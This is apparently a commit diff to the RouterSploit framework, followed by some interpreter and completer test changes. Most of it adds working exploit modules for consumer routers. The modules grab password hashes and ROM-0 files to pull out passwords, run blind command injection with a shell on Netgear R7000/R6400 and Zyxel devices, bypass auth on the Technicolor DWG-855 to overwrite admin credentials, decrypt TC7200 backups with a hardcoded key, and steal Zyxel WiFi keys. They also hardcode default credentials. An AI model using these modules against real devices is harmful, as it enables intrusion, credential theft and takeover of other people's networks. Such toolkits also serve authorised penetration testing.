'Linksys EA6700 < Ver.1.1.40 (Build 160989)',
'Linksys EA6900 < Ver.1.1.42 (Build 161129)',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
url = "{}:{}/.htpasswd".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
print_error("Exploit failed - connection error")
return
print_info("Unix crypt hash: $id$salt$hashed") # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
print_success("Hash found:", response.text)
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute
def check(self):
url = "{}:{}/.htpasswd".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200:
res = re.findall("^([a-zA-Z0-9]+:\$[0-9]\$)", response.text)
if len(res):
return True
return False
routersploit/modules/exploits/multi/rom0.py 0 → 100644
import io
import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
http_request,
mute,
validators,
)
from routersploit.utils import lzs
class Exploit(exploits.Exploit):
"""
Exploit implementation for RomPager ROM-0 authentication bypass vulnerability.
If the target is vulnerable it allows to download rom file and extract plaintext password.
"""
__info__ = {
'name': 'RomPager ROM-0',
'description': 'Exploits RomPager ROM-0 authentication bypass vulnerability that allows downloading rom file and extract password without credentials.',
'authors': [
'0BuRner', # routersploit module
],
'references': [
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-4019',
'http://www.osvdb.org/show/osvdb/102668',
'https://dariusfreamon.wordpress.com/tag/rompager/',
'http://rootatnasro.wordpress.com/2014/01/11/how-i-saved-your-a-from-the-zynos-rom-0-attack-full-disclosure/',
'https://antoniovazquezblanco.github.io/docs/advisories/Advisory_RomPagerXSS.pdf',
],
'devices': [
'AirLive WT-2000ARM (2.11.6.0(RE0.C29)3.7.6.1)',
'D-Link DSL-2520U (1.08 Hardware Version: B1)',
'D-Link DSL-2640R',
'D-Link DSL-2740R (EU_1.13 Hardware Version: A1)',
'Huawei 520 HG',
'Huawei 530 TRA',
'Pentagram Cerberus P 6331-42',
'TP-Link TD-8816',
'TP-Link TD-8817 (3.0.1 Build 110402 Rel.02846)',
'TP-LINK TD-8840T (3.0.0 Build 101208 Rel.36427)'
'TP-Link TD-W8901G',
'TP-Link TD-W8951ND',
'TP-Link TD-W8961ND',
'ZTE ZXV10 W300 (W300V1.0.0a_ZRD_CO3)',
'ZTE ZXDSL 831CII (ZXDSL 831CIIV2.2.1a_Z43_MD)'
'ZynOS',
'ZyXEL ES-2024',
'ZyXEL Prestige P-2602HW',
'ZyXEL Prestige 782R',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Downloading rom-0 file...")
url = "{}:{}/rom-0".format(self.target, self.port)
response = http_request(method="GET", url=url)
response.raise_for_status()
with io.BytesIO(response.content) as f:
print_status("Extracting password from file...")
password = self.extract_password(f)
print_success("Router password is: {}".format(password))
else:
print_error("Target is not vulnerable")
@staticmethod
def extract_password(fhandle):
fpos = 8568
fend = 8788
chunk = "*"
amount = 221
fhandle.seek(fpos)
while fpos < fend:
if fend - fpos < amount:
amount = fend - fpos
chunk = fhandle.read(amount)
fpos += len(chunk)
# Decompress chunk
result, window = lzs.LZSDecompress(chunk)
print_status('Decompressed chunk: {0}'.format(result))
# Extract plaintext password
res = re.findall(b'([\040-\176]{5,})', result)
return res[0]
@mute
def check(self):
url = "{}:{}/rom-0".format(self.target, self.port)
response = http_request(method="HEAD", url=url)
if response is None:
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200:
return True
return False
routersploit/modules/exploits/netgear/r7000_r6400_rce.py 0 → 100644
from routersploit import (
exploits,
print_status,
print_success,
print_error,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netgear R7000 and R6400 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands on operating system level.
"""
__info__ = {
'name': 'Netgear R7000 & R6400 RCE',
'description': 'Module exploits remote command execution in Netgear R7000 and R6400 devices. If the target is '
'vulnerable, command loop is invoked that allows executing commands on operating system level.',
'authors': [
'Chad Dougherty', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/',
'https://www.exploit-db.com/exploits/40889/',
'http://www.kb.cert.org/vuls/id/582384',
],
'devices': [
'R6400 (AC1750)',
'R7000 Nighthawk (AC1900, AC2300)',
'R7500 Nighthawk X4 (AC2350)',
'R7800 Nighthawk X4S(AC2600)',
'R8000 Nighthawk (AC3200)',
'R8500 Nighthawk X8 (AC5300)',
'R9000 Nighthawk X10 (AD7200)',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check():
print_success("Target is probably vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection. Try to start telnet with telnet telnetd -p '4445'")
shell(self, architecture="arm")
else:
print_error("Target is not vulnerable")
def execute(self, cmd):
cmd = cmd.replace(" ", "$IFS")
url = "{}:{}/cgi-bin/;{}".format(self.target, self.port, cmd)
http_request(method="GET", url=url)
return ""
@mute
def check(self):
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="HEAD", url=url)
if response is None:
return False # target is not vulnerable
if "WWW-Authenticate" in response.headers.keys():
if any(map(lambda x: x in response.headers['WWW-Authenticate'], ["NETGEAR R7000", "NETGEAR R6400"])):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/technicolor/dwg855_authbypass.py 0 → 100644
from routersploit import (
exploits,
print_success,
print_error,
print_status,
sanitize_url,
http_request,
mute,
validators
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters.
"""
__info__ = {
'name': 'Technicolor DWG-855 Auth Bypass',
'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous credentials, this is NOT stealthy.',
'authors': [
'JPaulMora <https://JPaulMora.GitHub.io>', # vulnerability discovery, routersploit module
'0BuRner', # routersploit module
],
'references': [
'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
],
'devices': [
'Technicolor DWG-855',
]
}
target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
nuser = exploits.Option('ruser', 'New user (overwrites existing user)')
npass = exploits.Option('rpass', 'New password (overwrites existing password)')
# The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
vulnresp = "\x11\x44\x75\x63\x6b\x79\x00" # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
print_error("Target did not answer request")
elif response.status_code == 401:
print_error("Target answered, denied access.")
else:
print_success("Credentials changed")
else:
print_error("Exploit failed - Target seems to be not vulnerable")
@mute
def check(self):
url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Authorization': 'Og==', # this is base64(":")
'Cache-Control': 'no-cache'}
response = http_request(method="GET", url=url, headers=headers)
if response is not None and self.vulnresp in response.text.encode('utf-8'):
return True
else:
return False
routersploit/modules/exploits/technicolor/tc7200_password_disclosure_v2.py 0 → 100644
import binascii
import struct
from Crypto.Cipher import AES
from routersploit import (
exploits,
print_success,
print_error,
print_status,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Technicolor TC7200 password disclosure vulnerability.
If the target is vulnerable, it allows read credentials for administration user.
"""
__info__ = {
'name': 'Technicolor TC7200 Password Disclosure',
'description': 'Module exploits Technicolor TC7200 password disclosure vulnerability which allows fetching administration\'s password.',
'authors': [
'Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)', # vulnerability discovery
'0BuRner', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/40157/',
'http://www.search-lab.hu/advisories/secadv-20160720'
],
'devices': [
'Technicolor TC7200',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check():
print_success("Target is vulnerable")
url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200 and "MLog" in response.text:
print_status("Reading GatewaySettings.bin...")
plain = self.decrypt_backup(response.text)
name, pwd = self.parse_backup(plain)
print_success('Exploit success! login: {}, password: {}'.format(name, pwd))
else:
print_error("Exploit failed. Could not extract config file.")
else:
print_error("Target is not vulnerable")
@staticmethod
def parse_backup(backup):
p = backup.find('MLog')
if p > 0:
p += 6
nh = struct.unpack('!H', backup[p:p + 2])[0]
name = backup[p + 2:p + 2 + nh]
p += 2 + nh
pwd = backup[p + 2:p + 2 + nh]
return name, pwd
return '', ''
@staticmethod
def decrypt_backup(backup):
key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F')
l = (len(backup) / 16) * 16
cipher = AES.new(key, AES.MODE_ECB, '\x00' * 16)
plain = cipher.decrypt(backup[0:l])
return plain
@mute
def check(self):
url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200 and "MLog" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/zte/f6xx_default_root.py
......@@ -58,7 +58,7 @@ class Exploit(exploits.Exploit):
tn.close()
except:
print_error("Connection error {}:{}".format(self.target, self.port))
print_error("Connection error {}:23".format(self.target))
@mute
def check(self):
......
routersploit/modules/exploits/zte/zxv10_rce.py
......@@ -10,6 +10,7 @@ from routersploit import (
print_success,
print_status,
shell,
http_request,
)
......@@ -20,7 +21,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE ZXV10 RCE',
'description': 'Exploits ZTE ZXV10 H108L remote code execution vulnerability that allows executing commands on operating system level.',
'description': 'Exploits ZTE ZXV10 H108L remote code execution vulnerability '
'that allows executing commands on operating system level.',
'authors': [
'Anastasios Stasinopoulos', # vulnerabiltiy discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -39,8 +41,6 @@ class Exploit(exploits.Exploit):
username = exploits.Option('root', 'Username to log in with')
password = exploits.Option('W!n0&oO7.', 'Password to log in with')
session = None
def __init__(self):
self.session = requests.Session()
......@@ -56,14 +56,15 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)
path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&" \
"DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)
url = "{}:{}{}".format(self.target, self.port, path)
try:
response = self.session.get(url)
response = http_request("GET", url, self.session)
time.sleep(3)
url = "{}:{}/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch".format(self.target, self.port)
response = self.session.get(url)
response = http_request("GET", url, self.session)
time.sleep(1)
res = re.findall(r'textarea_1">(.*) -c', response.text)
......@@ -87,7 +88,7 @@ class Exploit(exploits.Exploit):
url = "{}:{}/template.gch".format(self.target, self.port)
try:
response = self.session.get(url)
response = http_request("GET", url, self.session)
except:
return
......@@ -115,7 +116,7 @@ class Exploit(exploits.Exploit):
url = "{}:{}/".format(self.target, self.port)
try:
response = self.session.get(url=url)
response = http_request("GET", url, self.session)
if response is None:
return
......@@ -132,7 +133,7 @@ class Exploit(exploits.Exploit):
"Username": self.username,
"Password": self.password}
response = self.session.post(url, data=data)
response = http_request("POST", url, self.session, data=data)
if "Username" not in response.text and "Password" not in response.text:
print_success("Successful authentication")
return True
......
routersploit/modules/exploits/zyxel/d1000_rce.py 0 → 100644
from routersploit import (
exploits,
print_error,
print_status,
print_success,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Zyxel/Eir D1000 Remote Command Execution vulnerability.
If the target is vulnerable it allows to execute commands on operating system level.
"""
__info__ = {
'name': 'Zyxel Eir D1000 RCE',
'description': 'Module exploits Remote Command Execution vulnerability in Zyxel/Eir D1000 devices.'
'If the target is vulnerable it allows to execute commands on operating system level.',
'authors': [
'kenzo', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/',
'https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759',
'https://broadband-forum.org/technical/download/TR-064.pdf',
],
'devices': [
'Zyxel EIR D1000',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(7547, 'Target port') # default port
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
shell(self, architecture="mips")
else:
print_error("Target seems to be not vulnerable")
def execute(self, cmd):
url = "{}:{}/UD/act?1".format(self.target, self.port)
headers = {"Content-Type": "text/xml",
"SOAPAction": "urn:dslforum-org:service:Time:1#SetNTPServers"}
data = ("<?xml version=\"1.0\"?>"
"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
" <SOAP-ENV:Body>"
" <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
" <NewNTPServer1>`{}`</NewNTPServer1>" # injection
" <NewNTPServer2></NewNTPServer2>"
" <NewNTPServer3></NewNTPServer3>"
" <NewNTPServer4></NewNTPServer4>"
" <NewNTPServer5></NewNTPServer5>"
" </u:SetNTPServers>"
" </SOAP-ENV:Body>"
"</SOAP-ENV:Envelope>").format(cmd)
http_request(method="POST", url=url, headers=headers, data=data)
return ""
@mute
def check(self): # todo: requires improvement
url = "{}:{}/globe".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None:
if response.status_code == 404 and "home_wan.htm" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/zyxel/d1000_wifi_password_disclosure.py 0 → 100644
import re
from routersploit import (
exploits,
print_error,
print_success,
http_request,
mute,
validators,
print_table,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Zyxel/Eir D1000 Password Disclosure vulnerability.
If the target is vulnerable it allows to read WiFi password.
"""
__info__ = {
'name': 'Zyxel Eir D1000 WiFi Password Disclosure',
'description': 'Module exploits WiFi Password Disclosure vulnerability in Zyxel/Eir D1000 devices.'
'If the target is vulnerable it allows to read WiFi password.',
'authors': [
'Xiphos http://www.xiphosresearch.com/', # vulnerability discovery, poc exploit
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://github.com/XiphosResearch/exploits/tree/master/tr-06fail',
],
'devices': [
'Zyxel EIR D1000',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(7547, 'Target port') # default port
def run(self):
creds = []
password = self.get_wifi_key()
if password is not None:
creds.append(("WiFi Password", password))
print_success("Target seems to be vulnerable")
print_table(("Parameter", "Value"), *creds)
else:
print_error("Target seems to be not vulnerable")
@mute
def check(self):
if self.get_wifi_key() is not None:
return True # target is vulnerable
return False # target is not vulnerable
def get_wifi_key(self):
url = "{}:{}/UD/act?1".format(self.target, self.port)
headers = {"SOAPAction": "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"}
data = ("<?xml version=\"1.0\"?>"
"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
" <SOAP-ENV:Body>"
" <u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">"
" </u:GetSecurityKeys>"
" </SOAP-ENV:Body>"
"</SOAP-ENV:Envelope>")
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return None
password = re.findall("<NewPreSharedKey>(.*?)</NewPreSharedKey>", response.text)
if len(password):
return password[0]
return None
routersploit/modules/exploits/zyxel/p660hn-t_v1_rce.py 0 → 100644
from routersploit import (
exploits,
print_error,
print_status,
print_success,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Zyxel P660HN-T v1 Remote Command Execution vulnerability.
If the target is vulnerable it allows to execute commands on operating system level.
"""
__info__ = {
'name': 'Zyxel P660HN-T v1 RCE',
'description': 'Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices.'
'If the target is vulnerable it allows to execute commands on operating system level.',
'authors': [
'Pedro Ribeiro <pedrib[at]gmail.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://seclists.org/fulldisclosure/2017/Jan/40',
'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt',
'https://blogs.securiteam.com/index.php/archives/2910'
],
'devices': [
'Zyxel P660HN-T v1',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
shell(self, architecture="mips")
else:
print_error("Target seems to be not vulnerable")
def execute(self, cmd):
url = "{}:{}/cgi-bin/ViewLog.asp".format(self.target, self.port)
payload = ";{};#".format(cmd)
data = {"remote_submit_Flag": "1",
"remote_syslog_Flag": "1",
"RemoteSyslogSupported": "1",
"LogFlag": "0",
"remote_host": payload,
"remoteSubmit": "Save"}
http_request(method="POST", url=url, data=data)
return ""
@mute
def check(self):
url = "{}:{}/cgi-bin/authorize.asp".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False
if "ZyXEL P-660HN-T1A" in response.text:
return True
return False
routersploit/modules/exploits/zyxel/p660hn-t_v2_rce.py 0 → 100644
import base64
from routersploit import (
exploits,
print_error,
print_status,
print_success,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Zyxel P660HN-T V2 Remote Command Execution vulnerability.
If the target is vulnerable it allows to execute commands on operating system level.
"""
__info__ = {
'name': 'Zyxel P660HN-T v2 RCE',
'description': 'Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T V2 devices.'
'If the target is vulnerable it allows to execute commands on operating system level.',
'authors': [
'Pedro Ribeiro <pedrib[at]gmail.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://seclists.org/fulldisclosure/2017/Jan/40',
'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt',
'https://blogs.securiteam.com/index.php/archives/2910'
],
'devices': [
'Zyxel P660HN-T v2',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
username = exploits.Option('supervisor', 'Username for the web interface')
password = exploits.Option('zyad1234', 'Password for the web interface')
session = None
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available. Command length up to 28 characters.")
shell(self, architecture="mips")
else:
print_error("Target seems to be not vulnerable")
def execute(self, cmd):
url = "{}:{}/cgi-bin/pages/maintenance/logSetting/logSet.asp".format(self.target, self.port)
payload = "1.1.1.1`{}`&#".format(cmd)
data = {
"logSetting_H": "1",
"active": "1",
"logMode": "LocalAndRemote",
"serverPort": "123",
"serverIP": payload
}
http_request(method="POST", url=url, data=data, session=self.session)
return ""
@mute
def check(self):
url = "{}:{}/js/Multi_Language.js".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False
if "P-660HN-T1A_IPv6" in response.text:
return True
return False
def login(self):
credentials = base64.encode("{}:{}".format(self.username, self.password))
url = "{}:{}/cgi-bin/index.asp?" + credentials
data = {
"Loginuser": "supervisor",
"Prestige_Login": "Login"
}
response = http_request(method="POST", url=url, data=data, session=self.session)
if response is not None and response.status_code == 200:
return True
return False
routersploit/modules/scanners/bhu_scan.py 0 → 100644
from __future__ import absolute_import
from .autopwn import Exploit as BaseScanner
class Exploit(BaseScanner):
"""Scanner implementation for BHU vulnerabilities."""
__info__ = {
'name': 'BHU Scanner',
'description': 'Scanner module for BHU devices',
'authors': [
'Tao "depierre" Sauvage',
],
'references': (
'',
),
'devices': (
'BHU uRouter',
),
}
vendor = 'bhu'
routersploit/modules/scanners/billion_scan.py 0 → 100755
from __future__ import absolute_import
from .autopwn import Exploit as BaseScanner
class Exploit(BaseScanner):
"""
Scanner implementation for Billion vulnerabilities.
"""
__info__ = {
'name': 'Billion Scanner',
'description': 'Scanner module for Billion devices',
'authors': [
'Mariusz Kupidura <f4wkes[at]gmail.com>', # routersploit module
],
'references': (
'',
),
'devices': (
'Billion',
),
}
vendor = 'billion'
routersploit/modules/scanners/zyxel_scan.py 0 → 100755
from __future__ import absolute_import
from .autopwn import Exploit as BaseScanner
class Exploit(BaseScanner):
"""
Scanner implementation for Zyxel vulnerabilities.
"""
__info__ = {
'name': 'Zyxel Scanner',
'description': 'Scanner module for Zyxel devices',
'authors': [
'Mariusz Kupidura <f4wkes[at]gmail.com>', # routersploit module
],
'references': (
'',
),
'devices': (
'Zyxel',
),
}
vendor = 'zyxel'
routersploit/test/test_case.py
......@@ -20,6 +20,9 @@ class RoutersploitTestCase(unittest.TestCase):
msg="'{}' method should be decorated with 'module_required'".format(function.__name__)
)
def assertIsSubset(self, subset, container):
[self.assertIn(element, container) for element in subset]
def assertIsSequence(self, arg):
self.assertEqual(
True,
......
routersploit/test/test_completer.py
......@@ -32,7 +32,7 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
def test_raw_commands_no_module(self):
self.rsf.send("\t\t")
self.assertPrompt('exec exit help show use \r\n', self.raw_prompt)
self.assertPrompt('exec exit help search show use \r\n', self.raw_prompt)
def test_complete_use_raw(self):
self.rsf.send("u\t\t")
......@@ -89,7 +89,8 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
self.set_module()
self.rsf.send("\t\t")
self.assertPrompt(
' exec exit help run set setg show use \r\n',
'back exec help search setg use \r\n'
'check exit run set show \r\n',
self.module_prompt('FTP Bruteforce')
)
......@@ -117,20 +118,28 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
'run'
)
def test_complete_search(self):
self.set_module()
self.rsf.send("sea\t")
self.assertPrompt(
self.module_prompt('FTP Bruteforce'),
'search ',
)
def test_complete_set_raw(self):
self.set_module()
self.rsf.send("s\t\t")
self.assertPrompt(
'set setg show \r\n',
'search set setg show \r\n',
self.module_prompt('FTP Bruteforce')
)
def test_complete_set_raw_2(self):
self.set_module()
self.rsf.send("se\t")
self.rsf.send("se\t\t")
self.assertPrompt(
'search set setg \r\n',
self.module_prompt('FTP Bruteforce'),
'se\at',
)
def test_complete_set_raw_3(self):
......@@ -145,7 +154,8 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
self.set_module()
self.rsf.send("set \t\t")
self.assertPrompt(
'passwords stop_on_success threads verbosity\r\nport target usernames \r\n',
'passwords stop_on_success threads verbosity\r\n'
'port target usernames \r\n',
self.module_prompt('FTP Bruteforce'),
'set ',
)
......@@ -162,7 +172,8 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
self.set_module()
self.rsf.send("setg \t\t")
self.assertPrompt(
'passwords stop_on_success threads verbosity\r\nport target usernames \r\n',
'passwords stop_on_success threads verbosity\r\n'
'port target usernames \r\n',
self.module_prompt('FTP Bruteforce'),
'setg ',
)
......@@ -182,7 +193,8 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
self.set_module()
self.rsf.send("\t\t")
self.assertPrompt(
" exec exit help run set setg show use \r\n",
"back exec help search setg use \r\n"
"check exit run set show \r\n",
self.module_prompt('FTP Bruteforce'),
)
......@@ -194,7 +206,8 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
self.rsf.send("setg target foo\r\n")
self.rsf.send("\t\t")
self.assertPrompt(
' use \r\ncheck exit run setg unsetg \r\n',
'back exec help search setg unsetg \r\n'
'check exit run set show use \r\n',
self.module_prompt('FTP Bruteforce'),
)
......@@ -255,5 +268,6 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
'show options'
)
if __name__ == '__main__':
unittest.main()
routersploit/test/test_interpreter.py
......@@ -256,21 +256,21 @@ class RoutersploitInterpreterTest(RoutersploitTestCase):
def test_suggested_commands_with_loaded_module_and_no_global_value_set(self):
self.assertEqual(
list(self.interpreter.suggested_commands()),
['back', 'check', 'exec ', 'exit', 'help', 'run', 'set ', 'setg ', 'show ', 'use '] # Extra space at the end because of following param
['back', 'check', 'exec ', 'exit', 'help', 'run', 'search ', 'set ', 'setg ', 'show ', 'use '] # Extra space at the end because of following param
)
def test_suggested_commands_with_loaded_module_and_global_value_set(self):
GLOBAL_OPTS['key'] = 'value'
self.assertEqual(
list(self.interpreter.suggested_commands()),
['back', 'check', 'exec ', 'exit', 'help', 'run', 'set ', 'setg ', 'show ', 'unsetg ', 'use '] # Extra space at the end because of following param
['back', 'check', 'exec ', 'exit', 'help', 'run', 'search ', 'set ', 'setg ', 'show ', 'unsetg ', 'use '] # Extra space at the end because of following param
)
def test_suggested_commands_without_loaded_module(self):
self.interpreter.current_module = None
self.assertEqual(
self.interpreter.suggested_commands(), # Extra space at the end because of following param
['exec ', 'exit', 'help', 'show ', 'use ']
['exec ', 'exit', 'help', 'search ', 'show ', 'use ']
)
@mock.patch('importlib.import_module')
......@@ -621,5 +621,56 @@ class RoutersploitInterpreterTest(RoutersploitTestCase):
]
)
@mock.patch('routersploit.utils.print_info')
def test_command_search_01(self, mock_print):
self.interpreter.modules = [
'exploits.asus.foo',
'exploits.asus.bar',
'exploits.linksys.baz',
'exploits.cisco.foo',
]
self.interpreter.command_search("asus")
self.assertEqual(
mock_print.mock_calls,
[
mock.call('exploits/\x1b[31masus\x1b[0m/foo'),
mock.call('exploits/\x1b[31masus\x1b[0m/bar'),
]
)
@mock.patch('routersploit.utils.print_info')
def test_command_search_02(self, mock_print):
self.interpreter.modules = [
'exploits.asus.foo',
'exploits.asus.bar',
'exploits.linksys.baz',
'exploits.cisco.foo',
]
self.interpreter.command_search("foo")
self.assertEqual(
mock_print.mock_calls,
[
mock.call('exploits/asus/\x1b[31mfoo\x1b[0m'),
mock.call('exploits/cisco/\x1b[31mfoo\x1b[0m')
]
)
@mock.patch('routersploit.utils.print_error')
def test_command_search_03(self, print_error):
self.interpreter.modules = [
'exploits.asus.foo',
'exploits.asus.bar',
'exploits.linksys.baz',
'exploits.cisco.foo',
]
self.interpreter.command_search("")
self.assertEqual(
print_error.mock_calls,
[
mock.call("Please specify search keyword. e.g. 'search cisco'"),
]
)
if __name__ == '__main__':
unittest.main()
routersploit/test/test_modules.py
......@@ -31,7 +31,7 @@ class ModuleTest(RoutersploitTestCase):
"authors",
"references"
)
self.assertItemsEqual(required_metadata, self.module_metadata.keys())
self.assertIsSubset(required_metadata, self.module_metadata.keys())
def test_metadata_type(self):
self.assertIsSequence(self.module_metadata['authors'])
......
routersploit/test/test_utils.py
from __future__ import absolute_import
import unittest
try:
......@@ -5,8 +7,8 @@ try:
except ImportError:
import mock
from routersploit.utils import index_modules
from routersploit.test import RoutersploitTestCase
from .. import utils
from . import RoutersploitTestCase
class UtilsTest(RoutersploitTestCase):
......@@ -19,7 +21,7 @@ class UtilsTest(RoutersploitTestCase):
)
path = 'path/to/module'
modules = index_modules(path)
modules = utils.index_modules(path)
mock_walk.assert_called_once_with(path)
self.assertEqual(
......@@ -39,7 +41,7 @@ class UtilsTest(RoutersploitTestCase):
)
path = 'path/to/module'
modules = index_modules(path)
modules = utils.index_modules(path)
mock_walk.assert_called_once_with(path)
......@@ -52,5 +54,42 @@ class UtilsTest(RoutersploitTestCase):
]
)
@mock.patch('routersploit.utils.print_info')
def test_print_table_01(self, mock_print):
utils.print_table(
["Name", "Value", "Description"],
('foo', 'bar', 'baz'),
(1, 2, 3),
("port", 80, "port number")
)
self.assertEqual(
mock_print.mock_calls,
[
mock.call(),
mock.call(' Name Value Description '),
mock.call(' ---- ----- ----------- '),
mock.call(' foo bar baz '),
mock.call(' 1 2 3 '),
mock.call(' port 80 port number '),
mock.call()
]
)
@mock.patch('routersploit.utils.print_info')
def test_print_table_02(self, mock_print):
utils.print_table(
